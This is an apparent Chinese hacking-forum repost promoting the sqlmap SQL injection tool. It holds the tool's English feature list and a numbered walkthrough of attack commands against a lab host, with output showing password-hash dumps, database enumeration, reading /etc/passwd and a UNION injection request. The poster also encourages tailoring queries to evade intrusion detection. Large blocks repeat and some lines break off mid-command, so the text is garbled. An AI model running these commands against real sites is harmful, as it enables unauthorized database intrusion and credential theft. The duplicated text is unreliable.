這是SEVEN大哥寫的!:
從黑防上看到他們說是有什麼內部的工具,國外的注入工具,python的。想下載看看,結果是vip工具。
就從百度上搜索,沒有發現。看來在國內還沒有流行。就直接去google上搜索去了。
結果發現了這個工具。
功能非常強大。
就從百度上搜索,沒有發現。看來在國內還沒有流行。就直接去google上搜索去了。
結果發現了這個工具。
功能非常強大。
我以前的想法,這個工具全都實現了。而且功能更強。新一代的強大工具。我還沒有時間來得及分析。感興趣的朋友可以去研究研究。
開源又功能強大的工具。
儘量不要外傳。
儘量不要外傳。
支持現在幾乎所有的數據庫,比國內的任何工具都強。我都開始懷疑穿山甲是不是源自於它。
支持get,post ,cookie注入。可以添加cookie和user-agent
支持盲注,錯誤回顯注入,還有其他多種注入方法。
支持代理,
優化算法,更高效。
指紋識別技術判斷數據庫
支持get,post ,cookie注入。可以添加cookie和user-agent
支持盲注,錯誤回顯注入,還有其他多種注入方法。
支持代理,
優化算法,更高效。
指紋識別技術判斷數據庫
以下是說明。
Here is a list of major features implemented in sqlmap:
* Full support for MySQL, Oracle, PostgreSQL and Microsoft SQL
Server database management system back-end. Besides these four DBMS,
sqlmap can also identify Microsoft Access, DB2, Informix and Sybase;
* Extensive database management system back-end fingerprint based
upon:
o Inband DBMS error messages
o DBMS banner parsing
o DBMS functions output comparison
o DBMS specific features such as MySQL comment injection
o Passive SQL injection fuzzing
* It fully supports two SQL injection techniques:
o Blind SQL injection, also known as Inference SQL injection
o Inband SQL injection, also known as UNION query SQL
injection
and it partially supports error based SQL injection as one of
the vectors for database management system fingerprint;
* It automatically tests all provided GET, POST, Cookie and User-
Agent parameters to find dynamic ones. On these it automatically tests
and detects the ones affected by SQL injection. Moreover each dynamic
parameter is tested for numeric, single quoted string, double quoted
string and all of these three type with one and two brackets to find
which is the valid syntax to perform further injections with;
* It is possible to provide the name of the only parameter(s) that
you want to perform tests and use for injection on, being them GET,
POST, Cookie parameters;
* SQL injection testing and detection does not depend upon the web
application database management system back-end. SQL injection
exploiting and query syntax obviously depend upon the web application
database management system back-end;
* It recognizes valid queries by false ones based upon HTML output
page hashes comparison by default, but it is also possible to choose
to perform such test based upon string matching;
* HTTP requests can be performed in both HTTP method GET and POST
(default: GET);
* It is possible to perform HTTP requests using a HTTP User-Agent
header string randomly selected from a text file;
* It is possible to provide a HTTP Cookie header string, useful
when the web application requires authentication based upon cookies
and you have such data;
* It is possible to provide an anonymous HTTP proxy address and
port to pass by the HTTP requests to the target URL;
* It is possible to provide the remote DBMS back-end if you
already know it making sqlmap save some time to fingerprint it;
* It supports various command line options to get database
management system banner, current DBMS user, current DBMS database,
enumerate users, users password hashes, databases, tables, columns,
dump tables entries, dump the entire DBMS, retrieve an arbitrary file
content (if the remote DBMS is MySQL) and provide your own SQL SELECT
statement to be evaluated;
* It is possible to make sqlmap automatically detect if the
affected parameter is also affected by an UNION query SQL injection
and, in such case, to use it to exploit the vulnerability;
* It is possible to exclude system databases when enumerating
tables, useful when dumping the entire DBMS databases tables entries
and you want to skip the default DBMS data;
* It is possible to view the Estimated time of arrival for each
query output, updated in real time while performing the SQL injection
attack;
* Support to increase the verbosity level of output messages;
* It is possible to save queries performed and their retrieved
value in real time on an output text file and continue the injection
resuming from such file in a second time;
* PHP setting magic_quotes_gpc bypass by encoding every query
string, between single quotes, with CHAR (or similar) DBMS specific
function.
昨天晚上實在忍不住,還是看了一些,然後測試了一下。裏面的sql語句太過於簡單,不過你可以定製。修改爲更富在的語句。以繞過注入檢測和其他IDS設
備。
稍晚一下,我編譯一個dos版本的給你們。
Server database management system back-end. Besides these four DBMS,
sqlmap can also identify Microsoft Access, DB2, Informix and Sybase;
* Extensive database management system back-end fingerprint based
upon:
o Inband DBMS error messages
o DBMS banner parsing
o DBMS functions output comparison
o DBMS specific features such as MySQL comment injection
o Passive SQL injection fuzzing
* It fully supports two SQL injection techniques:
o Blind SQL injection, also known as Inference SQL injection
o Inband SQL injection, also known as UNION query SQL
injection
and it partially supports error based SQL injection as one of
the vectors for database management system fingerprint;
* It automatically tests all provided GET, POST, Cookie and User-
Agent parameters to find dynamic ones. On these it automatically tests
and detects the ones affected by SQL injection. Moreover each dynamic
parameter is tested for numeric, single quoted string, double quoted
string and all of these three type with one and two brackets to find
which is the valid syntax to perform further injections with;
* It is possible to provide the name of the only parameter(s) that
you want to perform tests and use for injection on, being them GET,
POST, Cookie parameters;
* SQL injection testing and detection does not depend upon the web
application database management system back-end. SQL injection
exploiting and query syntax obviously depend upon the web application
database management system back-end;
* It recognizes valid queries by false ones based upon HTML output
page hashes comparison by default, but it is also possible to choose
to perform such test based upon string matching;
* HTTP requests can be performed in both HTTP method GET and POST
(default: GET);
* It is possible to perform HTTP requests using a HTTP User-Agent
header string randomly selected from a text file;
* It is possible to provide a HTTP Cookie header string, useful
when the web application requires authentication based upon cookies
and you have such data;
* It is possible to provide an anonymous HTTP proxy address and
port to pass by the HTTP requests to the target URL;
* It is possible to provide the remote DBMS back-end if you
already know it making sqlmap save some time to fingerprint it;
* It supports various command line options to get database
management system banner, current DBMS user, current DBMS database,
enumerate users, users password hashes, databases, tables, columns,
dump tables entries, dump the entire DBMS, retrieve an arbitrary file
content (if the remote DBMS is MySQL) and provide your own SQL SELECT
statement to be evaluated;
* It is possible to make sqlmap automatically detect if the
affected parameter is also affected by an UNION query SQL injection
and, in such case, to use it to exploit the vulnerability;
* It is possible to exclude system databases when enumerating
tables, useful when dumping the entire DBMS databases tables entries
and you want to skip the default DBMS data;
* It is possible to view the Estimated time of arrival for each
query output, updated in real time while performing the SQL injection
attack;
* Support to increase the verbosity level of output messages;
* It is possible to save queries performed and their retrieved
value in real time on an output text file and continue the injection
resuming from such file in a second time;
* PHP setting magic_quotes_gpc bypass by encoding every query
string, between single quotes, with CHAR (or similar) DBMS specific
function.
昨天晚上實在忍不住,還是看了一些,然後測試了一下。裏面的sql語句太過於簡單,不過你可以定製。修改爲更富在的語句。以繞過注入檢測和其他IDS設
備。
稍晚一下,我編譯一個dos版本的給你們。
1、首先安裝python2.5。
2、然後進入sqlmap的目錄,執行sqlmap
2、然後進入sqlmap的目錄,執行sqlmap
詳細用法
1、sqlmap -u 注入點
2、sqlmap -g "關鍵詞“ //這是通過google搜索注入,現在還不可以,不知道是什麼原因,可以直接修改爲百度
3、
python sqlmap.py -u "http://192.168.1.47/page.php?id=1&cat=2" -v 1
2、sqlmap -g "關鍵詞“ //這是通過google搜索注入,現在還不可以,不知道是什麼原因,可以直接修改爲百度
3、
python sqlmap.py -u "http://192.168.1.47/page.php?id=1&cat=2" -v 1
[hh:mm:25] [INFO] testing if the url is stable, wait a few seconds
[hh:mm:26] [INFO] url is stable
[hh:mm:26] [INFO] testing if GET parameter 'id' is dynamic
[hh:mm:26] [INFO] confirming that GET parameter 'id' is dynamic
[hh:mm:26] [INFO] GET parameter 'id' is dynamic
[hh:mm:26] [INFO] testing sql injection on GET parameter 'id'
[hh:mm:26] [INFO] testing numeric/unescaped injection on GET parameter
'id'
[hh:mm:26] [INFO] confirming numeric/unescaped injection on GET
parameter 'id'
[hh:mm:26] [INFO] GET parameter 'id' is numeric/unescaped injectable
[hh:mm:26] [INFO] testing MySQL
[hh:mm:26] [INFO] query: CONCAT('5', '5')
[hh:mm:26] [INFO] retrieved: 55
[hh:mm:26] [INFO] performed 20 queries in 0 seconds
[hh:mm:26] [INFO] confirming MySQL
[hh:mm:26] [INFO] query: LENGTH('5')
[hh:mm:26] [INFO] retrieved: 1
[hh:mm:26] [INFO] performed 13 queries in 0 seconds
[hh:mm:26] [INFO] query: SELECT 5 FROM information_schema.TABLES LIMIT
0, 1
[hh:mm:26] [INFO] retrieved: 5
[hh:mm:26] [INFO] performed 13 queries in 0 seconds
remote DBMS: MySQL >= 5.0.0
[hh:mm:26] [INFO] url is stable
[hh:mm:26] [INFO] testing if GET parameter 'id' is dynamic
[hh:mm:26] [INFO] confirming that GET parameter 'id' is dynamic
[hh:mm:26] [INFO] GET parameter 'id' is dynamic
[hh:mm:26] [INFO] testing sql injection on GET parameter 'id'
[hh:mm:26] [INFO] testing numeric/unescaped injection on GET parameter
'id'
[hh:mm:26] [INFO] confirming numeric/unescaped injection on GET
parameter 'id'
[hh:mm:26] [INFO] GET parameter 'id' is numeric/unescaped injectable
[hh:mm:26] [INFO] testing MySQL
[hh:mm:26] [INFO] query: CONCAT('5', '5')
[hh:mm:26] [INFO] retrieved: 55
[hh:mm:26] [INFO] performed 20 queries in 0 seconds
[hh:mm:26] [INFO] confirming MySQL
[hh:mm:26] [INFO] query: LENGTH('5')
[hh:mm:26] [INFO] retrieved: 1
[hh:mm:26] [INFO] performed 13 queries in 0 seconds
[hh:mm:26] [INFO] query: SELECT 5 FROM information_schema.TABLES LIMIT
0, 1
[hh:mm:26] [INFO] retrieved: 5
[hh:mm:26] [INFO] performed 13 queries in 0 seconds
remote DBMS: MySQL >= 5.0.0
4、指定參數注入
[hh:mm:17] [INFO] testing if the url is stable, wait a few seconds
[hh:mm:18] [INFO] url is stable
[hh:mm:18] [INFO] testing sql injection on parameter 'id'
[hh:mm:18] [INFO] testing numeric/unescaped injection on parameter
'id'
[hh:mm:18] [INFO] confirming numeric/unescaped injection on
parameter 'id'
[hh:mm:18] [INFO] parameter 'id' is numeric/unescaped injectable
[...]
[hh:mm:18] [INFO] url is stable
[hh:mm:18] [INFO] testing sql injection on parameter 'id'
[hh:mm:18] [INFO] testing numeric/unescaped injection on parameter
'id'
[hh:mm:18] [INFO] confirming numeric/unescaped injection on
parameter 'id'
[hh:mm:18] [INFO] parameter 'id' is numeric/unescaped injectable
[...]
Or if you want to provide more than one parameter, for instance:
5、指定方法和post的數據
python sqlmap.py -u "http://192.168.1.47/page.php" --method "POST" --
data "id=1&cat=2"
python sqlmap.py -u "http://192.168.1.47/page.php" --method "POST" --
data "id=1&cat=2"
6、指定cookie,可以注入一些需要登錄的地址
python sqlmap.py -u "http://192.168.1.47/page.php?id=1&cat=2" --cookie
"COOKIE_VALUE"
python sqlmap.py -u "http://192.168.1.47/page.php?id=1&cat=2" --cookie
"COOKIE_VALUE"
7、通過代理注入
python sqlmap.py -u "http://192.168.1.47/page.php?id=1&cat=2" --proxy
"http://127.0.0.1:8118"
8、指定關鍵詞,也可以不指定。程序會根據返回結果的hash自動判斷
python sqlmap.py -u "http://192.168.1.47/page.php?id=1&cat=2" --string
"STRING_ON_TRUE_PAGE"
9、指定數據,這樣就不用猜測其他的數據庫裏。可以提高效率。
--remote-dbms
10、指紋判別數據庫類型
python sqlmap.py -u "http://192.168.1.47/page.php?id=1&cat=2" -v 1 -f
11、獲取banner信息
python sqlmap.py -u "http://192.168.1.47/page.php?id=1&cat=2" -b
python sqlmap.py -u "http://192.168.1.47/page.php?id=1&cat=2" --proxy
"http://127.0.0.1:8118"
8、指定關鍵詞,也可以不指定。程序會根據返回結果的hash自動判斷
python sqlmap.py -u "http://192.168.1.47/page.php?id=1&cat=2" --string
"STRING_ON_TRUE_PAGE"
9、指定數據,這樣就不用猜測其他的數據庫裏。可以提高效率。
--remote-dbms
10、指紋判別數據庫類型
python sqlmap.py -u "http://192.168.1.47/page.php?id=1&cat=2" -v 1 -f
11、獲取banner信息
python sqlmap.py -u "http://192.168.1.47/page.php?id=1&cat=2" -b
banner: '5.0.38-Ubuntu_0ubuntu1.1-log'
12、獲取當前數據庫,當前用戶,所有用戶,密碼,所有可用數據庫。
python sqlmap.py -u "http://192.168.1.47/page.php?id=1&cat=2" --
current-db
python sqlmap.py -u "http://192.168.1.47/page.php?id=1&cat=2" --
current-db
current database: 'testdb'
python sqlmap.py -u "http://192.168.1.47/page.php?id=1&cat=2" --users
database management system users [5]:
[*] 'debian-sys-maint'@'localhost'
[*] 'root'@'127.0.0.1'
[*] 'root'@'leboyer'
[*] 'root'@'localhost'
[*] 'testuser'@'localhost'
[*] 'debian-sys-maint'@'localhost'
[*] 'root'@'127.0.0.1'
[*] 'root'@'leboyer'
[*] 'root'@'localhost'
[*] 'testuser'@'localhost'
database management system users password hashes:
[*] debian-sys-maint [1]:
password hash: *XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
[*] root [1]:
password hash: *YYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYY
[*] testuser [1]:
password hash: *ZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZ
[*] debian-sys-maint [1]:
password hash: *XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
[*] root [1]:
password hash: *YYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYY
[*] testuser [1]:
password hash: *ZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZ
python sqlmap.py -u "http://192.168.1.47/page.php?id=1&cat=2" --dbs
available databases [3]:
[*] information_schema
[*] mysql
[*] testdb
[*] information_schema
[*] mysql
[*] testdb
Database: information_schema
[16 tables]
+---------------------------------------+
| CHARACTER_SETS |
| COLLATION_CHARACTER_SET_APPLICABILITY |
| COLLATIONS |
| COLUMN_PRIVILEGES |
| COLUMNS |
| KEY_COLUMN_USAGE |
| ROUTINES |
| SCHEMA_PRIVILEGES |
| SCHEMATA |
| STATISTICS |
| TABLE_CONSTRAINTS |
| TABLE_PRIVILEGES |
| TABLES |
| TRIGGERS |
| USER_PRIVILEGES |
| VIEWS |
+---------------------------------------+
[16 tables]
+---------------------------------------+
| CHARACTER_SETS |
| COLLATION_CHARACTER_SET_APPLICABILITY |
| COLLATIONS |
| COLUMN_PRIVILEGES |
| COLUMNS |
| KEY_COLUMN_USAGE |
| ROUTINES |
| SCHEMA_PRIVILEGES |
| SCHEMATA |
| STATISTICS |
| TABLE_CONSTRAINTS |
| TABLE_PRIVILEGES |
| TABLES |
| TRIGGERS |
| USER_PRIVILEGES |
| VIEWS |
+---------------------------------------+
Database: mysql
Table: user
[37 columns]
+-----------------------+------+
| Column | Type |
+-----------------------+------+
| Alter_priv | enum |
| Alter_routine_priv | enum |
| Create_priv | enum |
| Create_routine_priv | enum |
| Create_tmp_table_priv | enum |
| Create_user_priv | enum |
| Create_view_priv | enum |
| Delete_priv | enum |
| Drop_priv | enum |
| Execute_priv | enum |
| File_priv | enum |
| Grant_priv | enum |
| Host | char |
| Index_priv | enum |
| Insert_priv | enum |
| Lock_tables_priv | enum |
| max_connections | int |
| max_questions | int |
| max_updates | int |
| max_user_connections | int |
| Password | char |
| Process_priv | enum |
| References_priv | enum |
| Reload_priv | enum |
| Repl_client_priv | enum |
| Repl_slave_priv | enum |
| Select_priv | enum |
| Show_db_priv | enum |
| Show_view_priv | enum |
| Shutdown_priv | enum |
| ssl_cipher | blob |
| ssl_type | enum |
| Super_priv | enum |
| Update_priv | enum |
| User | char |
| x509_issuer | blob |
| x509_subject | blob |
+-----------------------+------+
Table: user
[37 columns]
+-----------------------+------+
| Column | Type |
+-----------------------+------+
| Alter_priv | enum |
| Alter_routine_priv | enum |
| Create_priv | enum |
| Create_routine_priv | enum |
| Create_tmp_table_priv | enum |
| Create_user_priv | enum |
| Create_view_priv | enum |
| Delete_priv | enum |
| Drop_priv | enum |
| Execute_priv | enum |
| File_priv | enum |
| Grant_priv | enum |
| Host | char |
| Index_priv | enum |
| Insert_priv | enum |
| Lock_tables_priv | enum |
| max_connections | int |
| max_questions | int |
| max_updates | int |
| max_user_connections | int |
| Password | char |
| Process_priv | enum |
| References_priv | enum |
| Reload_priv | enum |
| Repl_client_priv | enum |
| Repl_slave_priv | enum |
| Select_priv | enum |
| Show_db_priv | enum |
| Show_view_priv | enum |
| Shutdown_priv | enum |
| ssl_cipher | blob |
| ssl_type | enum |
| Super_priv | enum |
| Update_priv | enum |
| User | char |
| x509_issuer | blob |
| x509_subject | blob |
+-----------------------+------+
13、顯示指定的文件內容,一般用於php
python sqlmap.py -u "http://192.168.1.47/page.php?id=1&cat=2" --file /
etc/passwd
python sqlmap.py -u "http://192.168.1.47/page.php?id=1&cat=2" --file /
etc/passwd
/etc/passwd:
---
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/false
backup:x:34:34:backup:/var/backups:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
mysql:x:104:105:MySQL Server,,,:/var/lib/mysql:/bin/false
postgres:x:105:107:PostgreSQL administrator,,,:/var/lib/postgresql:/
bin/bash
inquis:x:1000:100:Bernardo Damele,,,:/home/inquis:/bin/bash
---
---
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/false
backup:x:34:34:backup:/var/backups:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
mysql:x:104:105:MySQL Server,,,:/var/lib/mysql:/bin/false
postgres:x:105:107:PostgreSQL administrator,,,:/var/lib/postgresql:/
bin/bash
inquis:x:1000:100:Bernardo Damele,,,:/home/inquis:/bin/bash
---
14、執行你自己的sql語句。
python sqlmap.py -u "http://192.168.1.47/page.php?id=1&cat=2" -v 1 -e
"SELECT password FROM mysql.user WHERE user = 'root' LIMIT 0, 1"
"SELECT password FROM mysql.user WHERE user = 'root' LIMIT 0, 1"
[hh:mm:18] [INFO] fetching expression output: 'SELECT password FROM
mysql.user WHERE user = 'root' LIMIT 0, 1'
[hh:mm:18] [INFO] query: SELECT password FROM mysql.user WHERE user =
'root' LIMIT 0, 1
[hh:mm:18] [INFO] retrieved: YYYYYYYYYYYYYYYY
[hh:mm:19] [INFO] performed 118 queries in 0 seconds
SELECT password FROM mysql.user WHERE user = 'root' LIMIT 0, 1:
'YYYYYYYYYYYYYYYY'
mysql.user WHERE user = 'root' LIMIT 0, 1'
[hh:mm:18] [INFO] query: SELECT password FROM mysql.user WHERE user =
'root' LIMIT 0, 1
[hh:mm:18] [INFO] retrieved: YYYYYYYYYYYYYYYY
[hh:mm:19] [INFO] performed 118 queries in 0 seconds
SELECT password FROM mysql.user WHERE user = 'root' LIMIT 0, 1:
'YYYYYYYYYYYYYYYY'
[...]
[hh:mm:24] [INFO] testing inband sql injection on parameter 'id'
[hh:mm:24] [INFO] the target url could be affected by an inband sql
injection vulnerability
[hh:mm:24] [INFO] confirming inband sql injection on parameter 'id'
[...]
[hh:mm:24] [INFO] fetching banner
[hh:mm:24] [INFO] request: http://192.168.1.47/page.php?id=1 UNION ALL
SELECT CONCAT(CHAR(95,95,83,84,65,82,84,95,95), VERSION(),
CHAR(95,95,83,84,79,80,95,95)), NULL, NULL--&cat=2
[hh:mm:24] [INFO] performed 1 queries in 0 seconds
banner: '5.0.38-Ubuntu_0ubuntu1.1-log'
[hh:mm:24] [INFO] testing inband sql injection on parameter 'id'
[hh:mm:24] [INFO] the target url could be affected by an inband sql
injection vulnerability
[hh:mm:24] [INFO] confirming inband sql injection on parameter 'id'
[...]
[hh:mm:24] [INFO] fetching banner
[hh:mm:24] [INFO] request: http://192.168.1.47/page.php?id=1 UNION ALL
SELECT CONCAT(CHAR(95,95,83,84,65,82,84,95,95), VERSION(),
CHAR(95,95,83,84,79,80,95,95)), NULL, NULL--&cat=2
[hh:mm:24] [INFO] performed 1 queries in 0 seconds
banner: '5.0.38-Ubuntu_0ubuntu1.1-log'
16、保存注入過程到一個文件,還可以從文件恢復出注入過程,很方便,一大特色。你可以在注入的時候中斷,有時間再繼續。
python sqlmap.py -u "http://192.168.1.47/page.php?id=1&cat=2" -v 1 -b -
o "sqlmap.log"
python sqlmap.py -u "http://192.168.1.47/page.php?id=1&cat=2" -v 1 -b -
o "sqlmap.log"
[...]
[hh:mm:09] [INFO] fetching banner
[hh:mm:09] [INFO] query: VERSION()
[hh:mm:09] [INFO] retrieved: 5.0.30-Debian_3-log
[hh:mm:11] [INFO] performed 139 queries in 1 seconds
banner: '5.0.38-Ubuntu_0ubuntu1.1-log'
[hh:mm:09] [INFO] fetching banner
[hh:mm:09] [INFO] query: VERSION()
[hh:mm:09] [INFO] retrieved: 5.0.30-Debian_3-log
[hh:mm:11] [INFO] performed 139 queries in 1 seconds
banner: '5.0.38-Ubuntu_0ubuntu1.1-log'
python sqlmap.py -u "http://192.168.1.47/page.php?id=1&cat=2" -v 1 --
banner -o "sqlmap.log" --resume
banner -o "sqlmap.log" --resume
[...]
[hh:mm:13] [INFO] fetching banner
[hh:mm:13] [INFO] query: VERSION()
[hh:mm:13] [INFO] retrieved the length of query: 26
[hh:mm:13] [INFO] resumed from file 'sqlmap.log': 5.0.45-Deb
[hh:mm:13] [INFO] retrieved: ian_1ubuntu3-log
banner:
[hh:mm:13] [INFO] fetching banner
[hh:mm:13] [INFO] query: VERSION()
[hh:mm:13] [INFO] retrieved the length of query: 26
[hh:mm:13] [INFO] resumed from file 'sqlmap.log': 5.0.45-Deb
[hh:mm:13] [INFO] retrieved: ian_1ubuntu3-log
banner: